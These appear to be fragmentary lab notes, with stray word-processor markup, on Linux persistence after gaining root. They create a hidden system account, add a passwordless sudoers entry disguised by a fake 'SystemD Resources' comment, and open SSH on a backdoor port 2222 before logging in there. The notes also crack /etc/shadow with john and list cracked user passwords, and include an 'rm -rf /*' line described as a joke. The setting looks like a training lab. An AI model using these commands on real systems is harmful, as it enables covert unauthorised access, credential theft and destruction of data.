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useradd -r -M sysd #The -M ensures no home is created, -r means system-account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passwd sysd #There is no need for a sudo, we are already root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useradd -r -M sysd #the System UID is created initially when we use the -r flag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useradd -r -M sysd #This also applies to a GID - if they do not get the same NUMBER, you would have to change one or the other.  Presumably they will get the same ID# because they are system accounts and that specific number hasn’t been used yet.  Check with command “id”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echo -e "#SystemD Resources\nsysd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers #This command also adds a comment to the end of the /etc/sudoers file to disguise the new account!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  <w:t xml:space="preserve">sudo -l || sudo rm -rf /* #the second cmd is a joke!!!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sed 's/#Port 22/Port 22\nPort 2222/' /etc/ssh/sshd_config &gt; /etc/ssh/sshd_config2 &amp;&amp; mv /etc/ssh/sshd_config2 /etc/ssh/sshd_config #This is a one liner that opens both ports 22 &amp; 2222.  Without the use of a text editor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systemctl restart ssh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-p2222 sysd@192.168.6.105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bash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-p2222 sysd@192.168.6.105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--wordlist='/usr/share/john/password.lst' /etc/shadow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#####CONTENTS OF /etc/shadow - CRACKED#######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sysadmin:passw0rd:18387:0:99999:7:::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mitnik:trustno1:18387:0:99999:7:::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babbage:freedom:18387:0:99999:7:::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lovelace:dragon:18387:0:99999:7:::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stallman:computer:18387:0:99999:7:::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turing:lakers:18387:0:99999:7:::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sysd:blah:18564::::::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